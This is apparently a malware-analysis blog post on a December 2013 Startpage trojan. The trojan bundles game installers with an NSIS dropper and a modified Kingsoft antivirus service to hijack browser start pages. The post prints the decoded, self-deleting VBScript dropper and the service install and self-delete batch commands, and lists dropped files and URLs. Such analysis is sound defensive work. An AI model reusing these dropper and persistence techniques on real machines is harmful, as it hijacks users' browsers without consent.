<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit;"><span style="font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">This version of startpage found in the wild sometime early December 2013 is noticeably interesting. Unlike most of its predecessor where previous versions uses the registry hack</span> <span style="background-color: #f9f9f9; color: #333333; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] “Start Page”</span> <span style="font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">to change the start page of internet explorer, this one incorporates the use of a modified antivirus software to alter the start page of the browser. Together with the modified antivirus software, this version also includes many other non-malicious game software downloaders all squeezed/bundled (hence the title) together with the trojan using an NSIS</span> <span style="background-color: white; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">(Nullsoft Scriptable Install System)</span> <span style="font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">installer in an attempt to conceal its execution to the user.</span></span></b></div>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">A step by step procedure of how this trojan operates is revealed below.</span></b></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></b></div>
<div>
<ol style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates %PROGRAMFILES%\rayying directory.</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1iQbccFQHSlTSCIFhCCdqcV1ra4DMqaa5zX_gLvNgiGKsK9aOTjyBb7_MOgX9JyBpd3eNvMd6cfXByoDqKMqSzsubyvYYj3cf2neLSKY4OILngGcCehXfTqLr7dSKmMq1PTu7F38S/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1iQbccFQHSlTSCIFhCCdqcV1ra4DMqaa5zX_gLvNgiGKsK9aOTjyBb7_MOgX9JyBpd3eNvMd6cfXByoDqKMqSzsubyvYYj3cf2neLSKY4OILngGcCehXfTqLr7dSKmMq1PTu7F38S/s1600/1.png" height="93" width="320" /></span></a></b></div>
</li>
</ol>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates “%ALLUSERSPROFILE%\Desktop\ Intornat Explarer .lnk" which is a shortcut link to rayying.exe. Rayying.exe is a chinese web browser and is not malicious.</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSBJuW2mQ38r47cNrnFQQ3TxyVg-_Wez4CTHRiwsIZVhOmijOE44qR2EHnbLstPkULWY2V_WQwC_rWXbzrrax16hBTqz_sBJRWnmuUqmlyEX7Hh40d-n9Mi2CItfzrveD2KiJ4fzUP/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSBJuW2mQ38r47cNrnFQQ3TxyVg-_Wez4CTHRiwsIZVhOmijOE44qR2EHnbLstPkULWY2V_WQwC_rWXbzrrax16hBTqz_sBJRWnmuUqmlyEX7Hh40d-n9Mi2CItfzrveD2KiJ4fzUP/s1600/2.png" height="201" width="320" /></span></a></b></div>
</li>
</ol>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<ol start="3" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates a quick launch icon to rayying.exe in “%APPDATA%\Microsoft\Internet Explorer\Quick Launch” using Intornat Explorer again as shortcut name.</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyZ1frSMxHpstTMjJ6HHsBA4YJV_RdHGweidB0o-YYe5LCMQXEesWhAZWxqqnoOYizpy8FW3gBbN-AE7hSTLhsbNHuwWGUNB1odp5pS_Db0Hud2qCguMlmVRdyU_hp95sEyd64iLNR/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyZ1frSMxHpstTMjJ6HHsBA4YJV_RdHGweidB0o-YYe5LCMQXEesWhAZWxqqnoOYizpy8FW3gBbN-AE7hSTLhsbNHuwWGUNB1odp5pS_Db0Hud2qCguMlmVRdyU_hp95sEyd64iLNR/s1600/3.png" height="58" width="320" /></span></a></b></div>
</li>
</ol>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
<ol start="4" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Creates a directory %PROGRAMFILES%\soft275710 and drops the following files:</span></b></div>
</li>
</ol>
<ul style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<b><span style="font-family: inherit; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">300.bat - this will execute 300.reg file and forcefully restarts explorer.exe process</span></b></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">300.reg - this will add "Attributes"=dword:0133EC20 to registry keys pertaining to different explorer.exe functions like:</span></div>
</li>
<span style="font-family: inherit;">
<li style="display: inline; list-style: none;"><ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-size: 15px; list-style: circle; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="vertical-align: baseline; white-space: pre-wrap;">Default Navigator (</span><span style="background-color: white; color: #111111; vertical-align: baseline; white-space: pre-wrap;">{871C5380-42A0-1069-A2EA-08002B30309D})</span></div>
</li>
<li dir="ltr" style="background-color: white; color: #111111; font-size: 15px; list-style: circle; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="vertical-align: baseline; white-space: pre-wrap;">Computer Search Results folder ({1F4DE370-D627-11D1-BA4F-00A0C91EEDBA})</span></div>
</li>
<li dir="ltr" style="background-color: white; color: #111111; font-size: 15px; list-style: circle; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="vertical-align: baseline; white-space: pre-wrap;">Network Search Results ({E17D4FC0-5564-11D1-83F2-00A0C90DC849})</span></div>
</li>
</ul>
</li>
</span>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">275710.txt - a non-malicious txt file</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">b_2710.vbe - an encoded VB script that will execute 300.bat</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">w_2710.exe - an NSIS compiled dropper/installer of smes.exe (this NSIS is the trojan that is responsible for modifying the start page of web browsers)</span></div>
</li>
</ul>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The VB script (b_2710.vbe) can be further decoded using the following tool found in http://www.greymagic.com/security/tools/decoder/.</span></div>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Here is the decoded version of the script:</span></div>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">'1020111003101004571027101010</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Dim WSHShell</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Set WshShell = WScript.CreateObject("WScript.Shell")</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">strDesktop = WshShell.SpecialFolders("Desktop") :'ÌØÊâÎļþ¼Ð¡°×ÀÃ桱</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Favorites = WshShell.SpecialFolders("Favorites") :'ÌØÊâÎļþ¼Ð¡°×ÀÃ桱</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">on error resume next</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">strttWinDir = WshShell.ExpandEnvironmentStrings("%ProgramFiles%")</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">createobject("wscript.shell").run """300.bat""",0</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Dim fso</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Set fso =CreateObject("Scripting.FileSystemObject")</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<span style="font-family: inherit; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">fso.DeleteFile WScript.ScriptFullName</span></div>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<ol start="5" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Runs internet explorer with the following address “http://www.qq937.com/yxyz/cp12/index.html?cid=50789”. While this site loads, it continues its malicious activities to the unsuspecting user in the background.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZYt6OCzlZIGH2fIXcVG6vOPRvYDYx-oC9Z-hCGQx8awG8SF-zNsicSjcq6FkcImghC0kXcanVvU4tcgl9AUNLfMKg18KW5-PBqeXn6OcI4-4c2SKHI_0GbIrCTql3sNaFZQ1tbTd/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirZYt6OCzlZIGH2fIXcVG6vOPRvYDYx-oC9Z-hCGQx8awG8SF-zNsicSjcq6FkcImghC0kXcanVvU4tcgl9AUNLfMKg18KW5-PBqeXn6OcI4-4c2SKHI_0GbIrCTql3sNaFZQ1tbTd/s1600/4.png" height="159" width="320" /></span></a></div>
</li>
</ol>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<ol start="6" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">The trojan will then attempt to execute</span> <span style="font-style: italic; vertical-align: baseline; white-space: pre-wrap;">b_2710.vbe</span> <span style="vertical-align: baseline; white-space: pre-wrap;">but since this VBscript is still encoded, the operating system will just return an error. At this point, the trojan’s system infection routine is halted for a moment and will only continue if and only if the user closes the error message. It is possible that this flaw was unintentionally created by the malware author.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho3GGXe1uOtfqz-R-VyqGLmCwYJI8I2J3tW8pc4am0haQ_KykQl3sXkoY1GPU7OulzXYYS8SSzf2aRNSwLafXHGTaNhpbknNxopxv1-W_Z6Z9gkETD5k5QAQXSSvW3rSVbamx6TsSq/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho3GGXe1uOtfqz-R-VyqGLmCwYJI8I2J3tW8pc4am0haQ_KykQl3sXkoY1GPU7OulzXYYS8SSzf2aRNSwLafXHGTaNhpbknNxopxv1-W_Z6Z9gkETD5k5QAQXSSvW3rSVbamx6TsSq/s1600/5.png" /></span></a></div>
</li>
</ol>
<span style="font-family: inherit;"><br style="orphans: 2; text-align: -webkit-auto; widows: 2;" /></span>
<br />
<ol start="7" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Attempts to download and execute other components</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaxgtK7nVV2J-U1J5UbMwoiXzfzCPLOr6CJRxjf7Ob5Mv85QSwF-l7HAW_dOVfshL-JdGZLz0qktcA9L_H39kawyAmRiqaK1LAPRkvAz4wLfdtOoUeOz4vg4IZ3KIKcjmY1RvkwhHT/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaxgtK7nVV2J-U1J5UbMwoiXzfzCPLOr6CJRxjf7Ob5Mv85QSwF-l7HAW_dOVfshL-JdGZLz0qktcA9L_H39kawyAmRiqaK1LAPRkvAz4wLfdtOoUeOz4vg4IZ3KIKcjmY1RvkwhHT/s1600/6.png" height="59" width="320" /></span></a></div>
</li>
</ol>
<ol start="8" style="margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">Executes downloaded file %PROGRAMFILES%\soft275710\wl06079.exe detected by vipre as</span> <span style="background-color: #f9f9f9; color: #b40c1a; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Trojan.Win32.Generic!BT</span></span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="vertical-align: baseline; white-space: pre-wrap;">Executes %PROGRAMFILES%\soft275710\w_2710.exe (which installs smes.exe) detected by vipre as</span> <span style="background-color: white; color: #b40c1a; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Trojan.NSIS.Startpage.aen (v)</span></span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Executes downloaded file %PROGRAMFILES%\soft275710\JJmatch_11494.exe a non-malicious game installer</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: decimal; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">Executes downloaded file %PROGRAMFILES%\soft275710\pipi_dae_381.exe a non-malicious game installer</span></div>
</li>
</ol>
<div style="orphans: 2; widows: 2;">
<span style="font-family: inherit; font-size: 15px; line-height: 17.25px; white-space: pre-wrap;"><br /></span></div>
</div>
</div>
<div style="orphans: 2; widows: 2;">
<h3 style="-webkit-text-stroke-width: 0px; color: black; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<span style="font-family: inherit; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">An In Depth Analysis to w_2710.exe - Trojan.NSIS.Startpage.aen (v)</span></h3>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The file w_2710.exe; that came in bundled with other softwares using NSIS installer, is also compressed using an NSIS installer. Executing w_2710.exe will create two new directories in %ALLUSERSPROFILE%\Application Data as “kingsoft\kws” and “smes”.</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">For %ALLUSERSPROFILE%\Application Data\kingsoft\kws directory, the following files were added:</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kws.ini</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">spitesp.dat</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">spot.ini</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">For %ALLUSERSPROFILE%\Application Data\smes directory, the following files were added:</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">smes.exe</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kswbc.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kswebshield.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kwssp.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">kwsui.dll</span></div>
</li>
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">u.bat</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit;"><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">It will then execute the batch file u.bat which in turn executing three commands</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">smes.exe -install (installs smes.exe as a service), smes.exe - start (starts the service of smes.exe)</span> <span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> and</span> <span style="font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">del %0 (deletes u.bat)</span><span style="font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">.</span></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Smes.exe has 5 command line available and these are:</span></div>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-install</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">installs Kingsoft Antivirus Webshield Service</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-run</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">executes smes.exe as a normal process</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-uninstall</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">removes Kingsoft Antivirus Webshield Service</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-start</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">executes smes.exe as a service process</span></div>
</li>
</ul>
<div dir="ltr" style="font-size: medium; font-weight: normal; line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<span style="font-family: inherit; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">-console</span></div>
<ul style="font-size: medium; font-weight: normal; line-height: normal; margin-bottom: 0pt; margin-top: 0pt; text-align: -webkit-auto;">
<li dir="ltr" style="font-size: 15px; list-style: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit; vertical-align: baseline; white-space: pre-wrap;">executes smes.exe as a normal process with verbose logging enabled</span></div>
</li>
</ul>
